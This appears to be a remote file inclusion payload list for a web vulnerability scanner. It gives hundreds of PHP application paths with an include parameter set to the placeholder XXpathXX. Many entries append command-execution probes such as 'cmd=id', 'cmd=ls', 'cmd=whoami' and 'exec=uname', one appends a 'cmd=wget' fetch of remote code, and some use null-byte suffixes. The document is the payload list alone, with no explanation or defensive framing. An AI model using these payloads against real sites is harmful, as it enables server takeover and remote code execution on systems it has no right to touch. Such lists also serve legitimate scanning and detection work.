/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=XXpathXX /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=XXpathXX /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=XXpathXX /administrator/components/com_webring/admin.webring.docs.php?component_dir=XXpathXX? /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=XXpathXX /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=XXpathXX? /administrator/menu_add.php?site_absolute_path=XXpathXX? /administrator/menu_operation.php?site_absolute_path=XXpathXX? /adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=XXpathXX /adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=XXpathXX? /adodb/adodb-errorpear.inc.php?ourlinux_root_path=XXpathXX /adodb/adodb-pear.inc.php?ourlinux_root_path=XXpathXX /adodb/adodb.inc.php?path=XXpathXX /advanced_comment_system/admin.php?ACS_path=XXpathXX? /advanced_comment_system/index.php?ACS_path=XXpathXX? /afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=XXpathXX? /agenda.php3?rootagenda=XXpathXX /agenda2.php3?rootagenda=XXpathXX /aides/index.php?page=XXpathXX? /ains_main.php?ains_path=XXpathXX /ajax/loadsplash.php?full_path=XXpathXX /ajouter.php?include=XXpathXX? /akarru.gui/main_content.php?bm_content=XXpathXX /akocomments.php?mosConfig_absolute_path=XXpathXX /amazon/cart.php?cmd=add&asin=XXpathXX /amazon/index.php?lang=XXpathXX /amazon/info.php?asin=XXpathXX /annonce.php?page=XXpathXX?&cmd=id /announcements.php?phpraid_dir=XXpathXX /anzagien.php?config[root_ordner]=XXpathXX?cmd=id /apbn/templates/head.php?APB_SETTINGS[template_path]=XXpathXX /api.php?t_path_core=XXpathXX?&cmd=id /apps/apps.php?app=XXpathXX /appserv/main.php?appserv_root=XXpathXX /arab3upload/customize.php?path=XXpathXX?&cmd=pwd /arab3upload/initialize.php?path=XXpathXX?&cmd=pwd /arash_lib/class/arash_gadmin.class.php?arashlib_dir=XXpathXX /arash_lib/class/arash_sadmin.class.php?arashlib_dir=XXpathXX /arash_lib/include/edit.inc.php?arashlib_dir=XXpathXX /arash_lib/include/list_features.inc.php?arashlib_dir=XXpathXX /archive.php?scriptpath=XXpathXX? /aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=XXpathXX%00 /artlist.php?root_path=XXpathXX /assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=XXpathXX?cmd /assets/snippets/reflect/snippet.reflect.php?reflect_base=XXpathXX? /athena.php?athena_dir=XXpathXX /auction/auction_common.php?phpbb_root_path=XXpathXX /auction/includes/converter.inc.php?include_path=XXpathXX? /auction/includes/messages.inc.php?include_path=XXpathXX? /auction/includes/settings.inc.php?include_path=XXpathXX? /auction/phpAdsNew/view.inc.php?phpAds_path=XXpathXX /auth.cookie.inc.php?da_path=XXpathXX /auth.header.inc.php?da_path=XXpathXX /auth.sessions.inc.php?da_path=XXpathXX /auth/auth.php?phpbb_root_path=XXpathXX /auth/auth_phpbb/phpbb_root_path=XXpathXX /authenticate.php?default_path_for_themes=XXpathXX? /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=XXpathXX /authentication/smf/smf.functions.php?pConfig_auth[smf_path]=XXpathXX /auto_check_renewals.php?installed_config_file=XXpathXX?cmd=ls /autoindex.php?cfg_file=XXpathXX? /awzmb/adminhelp.php?Setting[OPT_includepath]=XXpathXX /awzmb/modules/admin.incl.php?Setting[OPT_includepath]=XXpathXX /awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=XXpathXX /awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=XXpathXX /awzmb/modules/help.incl.php?Setting[OPT_includepath]=XXpathXX /awzmb/modules/reg.incl.php?Setting[OPT_includepath]=XXpathXX /axoverzicht.cgi?maand=XXpathXX /b2-tools/gm-2-b2.php?b2inc=XXpathXX /b2verifauth.php?index=XXpathXX? /backend/addons/links/index.php?PATH=XXpathXX /basebuilder/src/main.inc.php?mj_config[src_path]=XXpathXX??? /bb_admin.php?includeFooter=XXpathXX /beacon/language/1/splash.lang.php?languagePath=XXpathXX /beacon/language/1/splash.lang.php?languagePath=XXpathXX? /belegungsplan/jahresuebersicht.inc.php?root=XXpathXX /belegungsplan/monatsuebersicht.inc.php?root=XXpathXX /belegungsplan/tagesuebersicht.inc.php?root=XXpathXX /belegungsplan/wochenuebersicht.inc.php?root=XXpathXX /bemarket/postscript/postscript.php?p_mode=XXpathXX /biblioteca/bib_form.php?CLASSPATH=XXpathXX /biblioteca/bib_pldetails.php?CLASSPATH=XXpathXX /biblioteca/bib_plform.php?CLASSPATH=XXpathXX /biblioteca/bib_plsearchc.php?CLASSPATH=XXpathXX /biblioteca/bib_plsearchs.php?CLASSPATH=XXpathXX /biblioteca/bib_save.php?CLASSPATH=XXpathXX /biblioteca/bib_searchc.php?CLASSPATH=XXpathXX /biblioteca/bib_searchs.php?CLASSPATH=XXpathXX /biblioteca/edi_form.php?CLASSPATH=XXpathXX /biblioteca/edi_save.php?CLASSPATH=XXpathXX /biblioteca/gen_form.php?CLASSPATH=XXpathXX /biblioteca/gen_save.php?CLASSPATH=XXpathXX /biblioteca/lin_form.php?CLASSPATH=XXpathXX /biblioteca/lin_save.php?CLASSPATH=XXpathXX /biblioteca/luo_form.php?CLASSPATH=XXpathXX /biblioteca/luo_save.php?CLASSPATH=XXpathXX /biblioteca/sog_form.php?CLASSPATH=XXpathXX /biblioteca/sog_save.php?CLASSPATH=XXpathXX /bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=XXpathXX /bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX? /bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX? /bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX? /bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=XXpathXX? /bild.php?config[root_ordner]=XXpathXX?&cmd=id /bin/qte_init.php?qte_root=XXpathXX? /bingoserver.php3?response_dir=XXpathXX /block.php?Include=XXpathXX /blocks/birthday.php?full_path=XXpathXX /blocks/events.php?full_path=XXpathXX /blocks/help.php?full_path=XXpathXX /blogcms/admin/media.php?DIR_LIBS=XXpathXX? /blogcms/admin/xmlrpc/server.php?DIR_LIBS=XXpathXX? /blogcms/index.php?DIR_PLUGINS=XXpathXX? /board/post.php?qb_path=XXpathXX /boitenews4/index.php?url_index=XXpathXX? /books/allbooks.php?home=XXpathXX /books/home.php?home=XXpathXX /books/mybooks.php?home=XXpathXX /bp_ncom.php?bnrep=XXpathXX /bp_ncom.php?bnrep=XXpathXX? /bp_news.php?bnrep=XXpathXX /bridge/enigma/E2_header.inc.php?boarddir=XXpathXX? /bridge/yabbse.inc.php?sourcedir=XXpathXX /bridges/SMF/logout.php?path_to_smf=XXpathXX /bu/bu_cache.php?bu_dir=XXpathXX? /bu/bu_claro.php?bu_dir=XXpathXX? /bu/bu_parse.php?bu_dir=XXpathXX? /bu/process.php?bu_dir=XXpathXX? /buddy.php?CONFIG[MWCHAT_Libs]=XXpathXX? /builddb.php?env_dir=XXpathXX /button/settings_sql.php?path=XXpathXX /cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=XXpathXX? /cal.func.php?dir_edge_lang=XXpathXX /calcul-page.php?home=XXpathXX /calendar.php?cfg_dir=XXpathXX? /calendar.php?lang=XXpathXX /calendar.php?path_to_calendar=XXpathXX /calendar.php?vwar_root=XXpathXX? /calendar/demo/index.php?date=&v=XXpathXX? /calendar/payment.php?insPath=XXpathXX /calendario/cal_insert.php?CLASSPATH=XXpathXX /calendario/cal_save.php?CLASSPATH=XXpathXX /calendario/cal_saveactivity.php?CLASSPATH=XXpathXX /cart.php?lang_list=XXpathXX /cart_content.php?cart_isp_root=XXpathXX /catalogg/inludes/include_once.php?include_file=XXpathXX /catalogshop.php?mosConfig_absolute_path=XXpathXX /cdsagenda/modification/SendAlertEmail.php?AGE=XXpathXX? /cfagcms/themes/default/index.php?main=XXpathXX /ch_readalso.php?read_xml_include=XXpathXX /challenge.php?vwar_root=XXpathXX /change_preferences2.php?target=XXpathXX? /chat.php?CONFIG[MWCHAT_Libs]=XXpathXX? /chat.php?my[root]=XXpathXX?cm=id /chat/adminips.php?banned_file=XXpathXX /chat/users_popupL.php3?From=XXpathXX /checkout.php?abs_path=XXpathXX /checkout.php?abs_path=XXpathXX? /ciamos_path/modules/forum/include/config.php?module_cache_path='XXpathXX' /circ.php?include_path=XXpathXX? /circolari/cir_save.php?CLASSPATH=XXpathXX /citywriter/head.php?path=XXpathXX? /cl_files/index.php?path_to_calendar=XXpathXX? /claroline/auth/ldap/authldap.php?includePath=XXpathXX /claroline/phpbb/page_tail.php?includePath=XXpathXX /claroline180rc1/claroline/inc/lib/import.lib.php?includePath=XXpathXX? /class.mysql.php?path_to_bt_dir=XXpathXX /class/Wiki/Wiki.php?c_node[class_path]=XXpathXX /class/jpcache/jpcache.php?_PSL[classdir]=XXpathXX?exec=uname /class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=XXpathXX /classes/Auth/OpenID/Association.php?_ENV[asicms][path]=XXpathXX /classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=XXpathXX /classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=XXpathXX /classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=XXpathXX /classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=XXpathXX /classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=XXpathXX /classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=XXpathXX /classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=XXpathXX /classes/Auth/OpenID/Message.php?_ENV[asicms][path]=XXpathXX /classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=XXpathXX /classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=XXpathXX /classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=XXpathXX /classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=XXpathXX /classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=XXpathXX /classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=XXpathXX /classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=XXpathXX /classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=XXpathXX /classes/Cache.class.php?rootdir=XXpathXX? /classes/Customer.class.php?rootdir=XXpathXX? /classes/Performance.class.php?rootdir=XXpathXX? /classes/Project.class.php?rootdir=XXpathXX? /classes/Representative.class.php?rootdir=XXpathXX? /classes/User.class.php?rootdir=XXpathXX? /classes/admin_o.php?absolutepath=XXpathXX /classes/adodbt/sql.php?classes_dir=XXpathXX /classes/adodbt/sql.php?classes_dir=XXpathXX? /classes/board_o.php?absolutepath=XXpathXX /classes/class_admin.php?PathToComment=XXpathXX? /classes/class_comments.php?PathToComment=XXpathXX? /classes/class_mail.inc.php?path_to_folder=XXpathXX /classes/common.php?rootdir=XXpathXX? /classes/core/language.php?rootdir=XXpathXX /classes/dev_o.php?absolutepath=XXpathXX /classes/file_o.php?absolutepath=XXpathXX /classes/html/com_articles.php?absolute_path=XXpathXX /classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX /classes/query.class.php?baseDir=XXpathXX /classes/tech_o.php?absolutepath=XXpathXX /classified.php?insPath=XXpathXX /classified_right.php?language_dir=XXpathXX /classifieds/index.php?lowerTemplate=XXpathXX /clear.php?bibtexrootrel=XXpathXX? /clearinfo.php?bibtexrootrel=XXpathXX? /click.php?dir=XXpathXX? /client.php?dir=XXpathXX /client/faq_1/PageController.php?dir=XXpathXX /clients/index.php?src=XXpathXX /cls_fast_template.php?fname=XXpathXX /cm68news/engine/oldnews.inc.php?addpath=XXpathXX?& /cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=XXpathXX? /cms/meetweb/classes/ManagerResource.class.php?root_path=XXpathXX /cms/meetweb/classes/ManagerRightsResource.class.php?root_path=XXpathXX /cms/meetweb/classes/RegForm.class.php?root_path=XXpathXX /cms/meetweb/classes/RegResource.class.php?root_path=XXpathXX /cms/meetweb/classes/RegRightsResource.class.php?root_path=XXpathXX /cms/meetweb/classes/modules.php?root_path=XXpathXX /cms/modules/form.lib.php?sourceFolder=XXpathXX? /cms/system/openengine.php?oe_classpath=XXpathXX??? /cmsimple2_7/cmsimple/cms.php?pth['file']['config']=XXpathXX? /cn_config.php?tpath=XXpathXX? /coast/header.php?sections_file=XXpathXX? /code/berylium-classes.php?beryliumroot=XXpathXX? /code/display.php?admindir=XXpathXX? /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=XXpathXX /com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=XXpathXX? /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=XXpathXX? /com_media_library/toolbar_ext.php?mosConfig_absolute_path=XXpathXX? /com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=XXpathXX? /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=XXpathXX? /comments.php?AMG_serverpath=XXpathXX /comments.php?scriptpath=XXpathXX? /common.inc.php?CFG[libdir]=XXpathXX /common.inc.php?CFG[libdir]=XXpathXX? /common.inc.php?base_path=XXpathXX /common.php?db_file=XXpathXX /common.php?dir=XXpathXX /common.php?ezt_root_path=XXpathXX? /common.php?include_path=XXpathXX /common.php?livealbum_dir=XXpathXX? /common.php?locale=XXpathXX /common.php?phpht_real_path=XXpathXX? /common/db.php?commonpath=XXpathXX? /common/func.php?CommonAbsD=XXpathXX? /common/func.php?CommonAbsDir=XXpathXX /community/Offline.php?sourcedir=XXpathXX? /component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=XXpathXX /components/calendar/com_calendar.php?absolute_path=XXpathXX? /components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=XXpathXX /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=XXpathXX /components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=XXpathXX /components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=XXpathXX /components/com_articles.php?absolute_path=XXpathXX? /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=XXpathXX /components/com_calendar.php?absolute_path=XXpathXX? /components/com_cpg/cpg.php?mosConfig_absolute_path=XXpathXX? /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=XXpathXX /components/com_facileforms/facileforms.frame.php?ff_compath=XXpathXX /components/com_forum/download.php?phpbb_root_path=XXpathXX /components/com_galleria/galleria.html.php?mosConfig_absolute_path=XXpathXX /components/com_guestbook.php?absolute_path=XXpathXX? /components/com_hashcash/server.php?mosConfig_absolute_path=XXpathXX? /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=XXpathXX /components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=XXpathXX /components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=XXpathXX /components/com_joomlaboard/file_upload.php?sbp=XXpathXX? /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=XXpathXX? /components/com_lm/archive.php?mosConfig_absolute_path=XXpathXX? /components/com_mambowiki/MamboLogin.php?IP=XXpathXX? /components/com_minibb.php?absolute_path=XXpathXX /components/com_mosmedia/media.divs.php?mosConfig_absolute_path=XXpathXX /components/com_mosmedia/media.tab.php?mosConfig_absolute_path=XXpathXX /components/com_mospray/scripts/admin.php?basedir=XXpathXX?&cmd=id /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=XXpathXX /components/com_mp3_allopass/allopass.php?mosConfig_live_site=XXpathXX /components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=XXpathXX? /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=XXpathXX? /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=XXpathXX /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=XXpathXX /components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=XXpathXX /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=XXpathXX /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=XXpathXX /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=XXpathXX? /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=XXpathXX /components/com_smf/smf.php?mosConfig_absolute_path=XXpathXX /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=XXpathXX /components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=XXpathXX /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=XXpathXX /components/com_thopper/inc/request_type.php?mosConfig_absolute_path=XXpathXX /components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=XXpathXX /components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=XXpathXX /components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=XXpathXX /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=XXpathXX /components/core/connect.php?language_path=XXpathXX /components/minibb/bb_plugins.php?absolute_path=XXpathXX? /components/minibb/index.php?absolute_path=XXpathXX? /components/xmlparser/loadparser.php?absoluteurl=XXpathXX /compteur/mapage.php?chemin=XXpathXX /conf.php?securelib=XXpathXX /conf.php?securelib=XXpathXX? /config.inc.php3?rel_path=XXpathXX /config.inc.php?_path=XXpathXX /config.inc.php?path_escape=XXpathXX /config.inc.php?path_escape=XXpathXX%00 /config.php?full_path=XXpathXX? /config.php?full_path_to_db=XXpathXX /config.php?fullpath=XXpathXX /config.php?incpath=XXpathXX /config.php?path_to_root=XXpathXX /config.php?rel_path=XXpathXX? /config.php?returnpath=XXpathXX /config.php?sql_language=XXpathXX? /config.php?xcart_dir=XXpathXX? /config/config_admin.php?INC=XXpathXX? /config/config_main.php?INC=XXpathXX? /config/config_member.php?INC=XXpathXX? /config/dbutil.bck.php?confdir=XXpathXX /config/mysql_config.php?INC=XXpathXX? /config/sender.php?ROOT_PATH=XXpathXX? /configuration.php?absolute_path=XXpathXX? /confirmUnsubscription.php?output=XXpathXX /connect.php?path=XXpathXX /connexion.php?DOCUMENT_ROOT=XXpathXX? /contact.php?blog_theme=XXpathXX /contacts.php?cal_dir=XXpathXX /contenido/external/frontend/news.php?cfg[path][includes]=XXpathXX /content.php?content=XXpathXX /content/admin.php?pwfile=XXpathXX /content/content.php?fileloc=XXpathXX? /content/delete.php?pwfile=XXpathXX /content/modify.php?pwfile=XXpathXX /content/modify_go.php?pwfile=XXpathXX /contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=XXpathXX /contrib/mx_glance_sdesc.php?mx_root_path=XXpathXX /contrib/phpBB2/modules.php?phpbb_root_path=XXpathXX? /controllers/MySQLController.php?baseDir=XXpathXX /controllers/SQLController.php?baseDir=XXpathXX /controllers/SetupController.php?baseDir=XXpathXX /controllers/VideoController.php?baseDir=XXpathXX /controllers/ViewController.php?baseDir=XXpathXX /convert-date.php?cal_dir=XXpathXX /convert/mvcw.php?step=1&vwar_root=XXpathXX /convert/mvcw.php?vwar_root=XXpathXX /core/admin/admin.php?p=admin&absoluteurlXXpathXX /core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurlXXpathXX /core/admin/categories_add.php?absoluteurlXXpathXX /core/admin/categories_remove.php?absoluteurlXXpathXX /core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurlXXpathXX /core/admin/editdel.php?p=admin&absoluteurlXXpathXX /core/admin/ftpfeature.php?p=admin&absoluteurlXXpathXX /core/admin/login.php?absoluteurlXXpathXX /core/admin/pgRSSnews.php?absoluteurlXXpathXX /core/admin/showcat.php?absoluteurlXXpathXX /core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurlXXpathXX /core/archive_cat.php?absoluteurlXXpathXX /core/archive_nocat.php?absoluteurlXXpathXX /core/aural.php?site_absolute_path=XXpathXX /core/aural.php?site_absolute_path=XXpathXX?&cmd=dir /core/editor.php?editor_insert_bottom=XXpathXX /core/includes.php?CMS_ROOT=XXpathXX? /core/recent_list.php?absoluteurlXXpathXX /corpo.php?pagina=XXpathXX /cp2.php?securelib=XXpathXX? /cpe/index.php?repertoire_config=XXpathXX /crea.php?plancia=XXpathXX /creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=XXpathXX? /creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=XXpathXX? /creat_news_all.php?language=XXpathXX /create_file.php?target=XXpathXX? /cron.php?ROOT_PATH=XXpathXX /cron.php?include_path=XXpathXX? /crontab/run_billing.php?config[include_dir]=XXpathXX? /cross.php?url=XXpathXX /custom_vars.php?sys[path_addon]=XXpathXX /customer/product.php?xcart_dir=XXpathXX /cwb/comanda.php?INCLUDE_PATH=XXpathXX? /datei.php?config[root_ordner]=XXpathXX?&cmd=id /db/PollDB.php?CONFIG_DATAREADERWRITER=XXpathXX? /db/mysql/db.inc.php?SPL_CFG[dirroot]=XXpathXX? /dbcommon/include.php?_APP_RELATIVE_PATH=XXpathXX /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=XXpathXX /debugger.php?config_atkroot=XXpathXX /decoder/gallery.php?ccms_library_path=XXpathXX /decoder/markdown.php?ccms_library_path=XXpathXX /defaults_setup.php?ROOT_PATH=XXpathXX?cmd=ls /defines.php?WEBCHATPATH=XXpathXX? /demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=XXpathXX& /depouilg.php3?NomVote=XXpathXX? /development.php?root_prefix=XXpathXX? /dfcode.php?DFORUM_PATH=XXpathXX? /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=XXpathXX? /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=XXpathXX? /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=XXpathXX /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=XXpathXX? /dialog.php?CONFIG[MWCHAT_Libs]=XXpathXX? /dialogs/a.php?spaw_dir=XXpathXX?&cmd=id /dialogs/collorpicker.php?spaw_dir=XXpathXX&cmd=id /dialogs/img.php?spaw_dir=XXpathXX?&cmd=id /dialogs/img_library.php?spaw_dir=XXpathXX?&cmd=id /dialogs/table.php?spaw_dir=XXpathXX?&cmd=id /dialogs/td.php?spaw_dir=XXpathXX?&cmd=id /digitaleye_Path/module.php?menu=XXpathXX? /dir/prepend.php?_PX_config[manager_path]=XXpathXX /dir_thatware/config.php?root_path=XXpathXX' /direct.php?rf=XXpathXX /direction/index.php?repertoire_config=XXpathXX /directory/index.php?path=XXpathXX /display.php?pag=XXpathXX /display.php?path=XXpathXX /displayCategory.php?basepath=XXpathXX /dix.php3?url_phpartenaire=XXpathXX /dm-albums/template/album.php?SECURITY_FILE=XXpathXX /doc/admin/index.php?ptinclude=XXpathXX /doceboCore/lib/lib.php?GLOBALS[where_framework]=XXpathXX /doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=XXpathXX /doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=XXpathXX /doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=XXpathXX /doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=XXpathXX /docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=XXpathXX /docs/front-end-demo/cart2.php?workdir=XXpathXX? /dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=XXpathXX?&cmd=wget%20XXpathXX /dosearch.php?RESPATH=XXpathXX /download.php?root_prefix=XXpathXX? /download_engine_V1.4.3/addmember.php?eng_dir=XXpathXX /download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=XXpathXX /download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=XXpathXX /downstat1.8/chart.php?art=XXpathXX? /dp_logs.php?HomeDir=XXpathXX /eXPerience2/modules.php?file=XXpathXX /ea-gBook/index_inc.php?inc_ordner=XXpathXX?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1 /edit.php?javascript_path=XXpathXX? /editor.php?newsfile=XXpathXX /editprofile.php?pathtohomedir=XXpathXX? /editsite.php?returnpath=XXpathXX /editx/add_address.php?include_dir=XXpathXX /elseif/contenus.php?contenus=XXpathXX /elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=XXpathXX /elseif/moduleajouter/articles/usrarticles.php?corpsdesign=XXpathXX /elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=XXpathXX /elseif/moduleajouter/depot/usrdepot.php?corpsdesign=XXpathXX /elseif/moduleajouter/depot/usrdepot.php?corpsdesignXXpathXX /elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=XXpathXX /elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=XXpathXX /elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=XXpathXX /elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=XXpathXX /elseif/utilisateurs/votes.php?tpelseifportalrepertoire=XXpathXX /email_subscribe.php?root_prefix=XXpathXX? /embed/day.php?path=XXpathXX /enc/content.php?Home_Path=XXpathXX? /engine/Ajax/editnews.php?root_dir=XXpathXX /engine/api/api.class.php?dle_config_api=XXpathXX? /engine/engine.inc.php?absolute_path=XXpathXX /engine/init.php?root_dir=XXpathXX /engine/require.php?MY_ENV[BASE_ENGINE_LOC]=XXpathXX? /enth3/show_joined.php?path=XXpathXX /environment.php?DIR_PREFIX=XXpathXX /epal/index.php?view=XXpathXX? /errors.php?error=XXpathXX /errors/configmode.php?GALLERY_BASEDIR=XXpathXX /errors/needinit.php?GALLERY_BASEDIR=XXpathXX /errors/reconfigure.php?GALLERY_BASEDIR=XXpathXX /errors/unconfigured.php?GALLERY_BASEDIR=XXpathXX /es_custom_menu.php?files_dir=XXpathXX /es_desp.php?files_dir=XXpathXX /es_offer.php?files_dir=XXpathXX /eshow.php?Config_rootdir=XXpathXX /esupport/admin/autoclose.php?subd=XXpathXX? /eva/index.php3?aide=XXpathXX? /eva/index.php3?perso=XXpathXX /eva/index.php?eva[caminho]=XXpathXX /event.php?myevent_path=XXpathXX /event_cal/module/embed/day.php?path=XXpathXX /eventcal2.php.php?path_simpnews=XXpathXX /eventscroller.php?path_simpnews=XXpathXX /example-view/templates/article.php?globals[content_dir]=XXpathXX? /example-view/templates/dates_list.php?globals[content_dir]=XXpathXX? /example-view/templates/root.php?globals[content_dir]=XXpathXX? /example.php?site=XXpathXX /example/gamedemo/inc.functions.php?projectPath=XXpathXX? /examplefile.php?bibtexrootrel=XXpathXX? /examples/patExampleGen/bbcodeSource.php?example=XXpathXX /exception/include.php?_APP_RELATIVE_PATH=XXpathXX /extauth/drivers/ldap.inc.php?clarolineRepositorySys=XXpathXX /extras/mt.php?web_root=XXpathXX /extras/poll/poll.php?file_newsportal=XXpathXX /ezusermanager_pwd_forgott.php?ezUserManager_Path=XXpathXX /faq.php?module_root_path=XXpathXX /faq.php?phpbb_root_path=XXpathXX /fckeditor/editor/dialog/fck_link.php?dirroot=XXpathXX /fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=XXpathXX /fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=XXpathXX?&cmd=id /fcring.php?s_fuss=XXpathXX /feed.php?config[root_ordner]=XXpathXX?&cmd=id /feed/index2.php?m=XXpathXX /files/amazon-bestsellers.php?CarpPath=XXpathXX /files/carprss.php?CarpPath=XXpathXX /files/compose-attach.php3?BSX_LIBDIR=XXpathXX /files/compose-menu.php3?BSX_LIBDIR=XXpathXX /files/compose-new.php3?BSX_LIBDIR=XXpathXX /files/compose-send.php3?BSX_LIBDIR=XXpathXX /files/folder-create.php3?BSX_LIBDIR=XXpathXX /files/folder-delete.php3?BSX_LIBDIR=XXpathXX /files/folder-empty.php3?BSX_LIBDIR=XXpathXX /files/folder-rename.php3?BSX_LIBDIR=XXpathXX /files/folders.php3?BSX_LIBDIR=XXpathXX /files/login.php3?err=hack&BSX_HTXDIR=XXpathXX /files/mainfile.php?page[path]=XXpathXX?&cmd=ls /files/mbox-list.php3?BSX_LIBDIR=XXpathXX 